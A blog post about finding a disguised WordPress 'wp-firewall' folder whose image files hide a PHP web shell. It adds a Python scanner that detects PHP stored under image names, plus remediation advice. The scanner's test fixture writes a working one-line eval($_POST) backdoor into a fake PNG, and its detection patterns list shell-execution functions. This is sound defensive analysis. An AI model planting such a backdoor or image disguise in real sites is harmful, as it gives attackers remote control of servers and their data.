WordPress wp-firewall web shell hack

Recently I discovered some interesting files on a WordPress website. They were inside a folder called “wp-firewall”, yet nothing of that name appeared in the WordPress plugins listing. Inspection of this folder revealed something I couldn’t find much about on the internet.

This is the structure of the wp-firewall folder:

[dir] wp-firewall/
  — wp_head_info.php
  [dir] favicon/
    —— background.png
    —— favicon.ico

Upon closer inspection, this doesn’t look like a WordPress plugin at all; it looks more like a hack. Opening the wp_head_info.php file locally revealed the following code:

It turns out these two “image” files are really containers for PHP code: background.png is a web shell, allowing an attacker to execute any command they like on your server. It calls PHP’s eval() function several times.

I don’t want to post the contents of the file here, so I’ve created a pastebin.
If you look through it you can see it’s a complete package for brute-force attempts, loading files, dumping data, executing SQL queries and sending data somewhere.
favicon.ico is base64-encoded code that unPHP could not decode. [pastebin]
No idea what this one does quite yet.
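To triage a tree like this, here is an added example (my own code, not code from the post or from the malware): a small Python scanner that walks a wp-content/plugins directory and flags the indicators described above. It reports a folder that WordPress would not list as a plugin (no top-level PHP file with a Plugin Name: header), files with image extensions whose bytes do not start with that format’s signature or that contain a PHP open tag, PHP files that include an image-named file, calls to eval()/base64_decode() and similar functions, and long base64 blobs. The sample tree is constructed inline to mirror the listing above; its file contents are placeholders, not the real malware, and the assumption that wp_head_info.php includes the image files is mine, since the post does not reproduce its code.

```python
import base64
import os
import re
import tempfile

# Bytes a genuine image must start with; a "PNG" without the PNG signature is not a picture.
MAGIC = {".png": b"\x89PNG\r\n\x1a\n", ".ico": b"\x00\x00\x01\x00",
         ".jpg": b"\xff\xd8\xff", ".gif": b"GIF8"}
PHP_OPEN = re.compile(rb"<\?php\b|<\?=")
# Functions a PHP web shell leans on; one capture group so findall() yields bare names.
SHELL_FUNCS = re.compile(
    rb"\b(eval|assert|base64_decode|gzinflate|gzuncompress|str_rot13|"
    rb"system|shell_exec|passthru|exec|popen|proc_open)\s*\(")
# A PHP file pulling in something named like an image.
INCLUDES_IMAGE = re.compile(
    rb"\b(?:include|require)(?:_once)?\b[^;]*?\.(?:png|ico|jpe?g|gif)\b", re.I)
LONG_BASE64 = re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")
# WordPress lists a folder as a plugin only if a top-level PHP file carries this
# header field; get_file_data() looks at the first 8 KiB only.
PLUGIN_HEADER = re.compile(rb"^[ \t/*#@]*Plugin Name:", re.M | re.I)


def scan_file(path):
    """Return the indicator names that apply to one file (empty if clean)."""
    with open(path, "rb") as fh:
        data = fh.read()
    ext = os.path.splitext(path)[1].lower()
    findings = []
    if ext in MAGIC and not data.startswith(MAGIC[ext]):
        findings.append("bad-image-magic")
    if ext in MAGIC and PHP_OPEN.search(data):
        findings.append("php-in-image")
    if ext == ".php" and INCLUDES_IMAGE.search(data):
        findings.append("includes-image")
    funcs = sorted({m.decode().lower() for m in SHELL_FUNCS.findall(data)})
    if funcs:
        findings.append("shell-funcs:" + ",".join(funcs))
    if LONG_BASE64.search(data):
        findings.append("long-base64-blob")
    return findings


def is_registered_plugin(plugin_dir):
    """True if the WordPress admin plugin listing would show this folder."""
    for name in sorted(os.listdir(plugin_dir)):
        full = os.path.join(plugin_dir, name)
        if name.lower().endswith(".php") and os.path.isfile(full):
            with open(full, "rb") as fh:
                if PLUGIN_HEADER.search(fh.read(8192)):
                    return True
    return False


def scan_plugins(plugins_root):
    """Walk every folder under wp-content/plugins; report registration and hits."""
    report = {}
    for folder in sorted(os.listdir(plugins_root)):
        pdir = os.path.join(plugins_root, folder)
        if not os.path.isdir(pdir):
            continue
        findings = {}
        for dirpath, _, files in os.walk(pdir):
            for name in files:
                full = os.path.join(dirpath, name)
                hits = scan_file(full)
                if hits:
                    rel = os.path.relpath(full, plugins_root).replace(os.sep, "/")
                    findings[rel] = hits
        report[folder] = {"registered": is_registered_plugin(pdir), "findings": findings}
    return report


def build_sample_tree(root):
    """Constructed fixture mirroring the post's listing; placeholder contents, not real malware."""
    fw = os.path.join(root, "wp-firewall", "favicon")
    os.makedirs(fw)
    # Assumption: the loader includes the "image" files (the post does not show its code).
    with open(os.path.join(root, "wp-firewall", "wp_head_info.php"), "wb") as f:
        f.write(b"<?php include __DIR__ . '/favicon/background.png'; ?>")
    with open(os.path.join(fw, "background.png"), "wb") as f:
        f.write(b"<?php eval(base64_decode($_POST['x'])); eval($_POST['y']); ?>")
    blob = base64.b64encode(b"placeholder payload " * 20)  # stands in for the encoded favicon.ico
    with open(os.path.join(fw, "favicon.ico"), "wb") as f:
        f.write(b"<?php eval(base64_decode('" + blob + b"')); ?>")
    # A benign plugin with a proper header and a real PNG signature, for contrast.
    ok = os.path.join(root, "example-plugin", "img")
    os.makedirs(ok)
    with open(os.path.join(root, "example-plugin", "example.php"), "wb") as f:
        f.write(b"<?php\n/**\n * Plugin Name: Example Plugin\n */\n")
    with open(os.path.join(ok, "logo.png"), "wb") as f:
        f.write(MAGIC[".png"] + b"\x00" * 32)


def demo():
    """Build the sample tree in a temp dir and scan it; returns the report."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_plugins(root)
```

Calling `demo()` reports wp-firewall as not registered, with wp_head_info.php flagged for including an image, both “images” flagged for a bad signature and a PHP open tag, and favicon.ico additionally flagged for its long base64 blob; the benign example-plugin folder comes back clean. On a real site, point `scan_plugins()` at the actual wp-content/plugins path; the magic-byte check is the one that catches PHP parked under image names even when the code is obfuscated enough to dodge the function-name regex.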

If you find this

If you happen to find something like this on your server, you’re at high risk. Because a web shell can execute anything, the chances are that there are other backdoors on the server too, and the only way to be 100% sure of removal is to wipe everything and rebuild from clean sources. Unfortunately this is your best option. You can try to save files, but be certain they’re not infected in any way before reusing them. Since a shell like this can read wp-config.php and run SQL queries, treat the database credentials, WordPress user passwords and any hosting (FTP/SSH) credentials as compromised and rotate them as well.
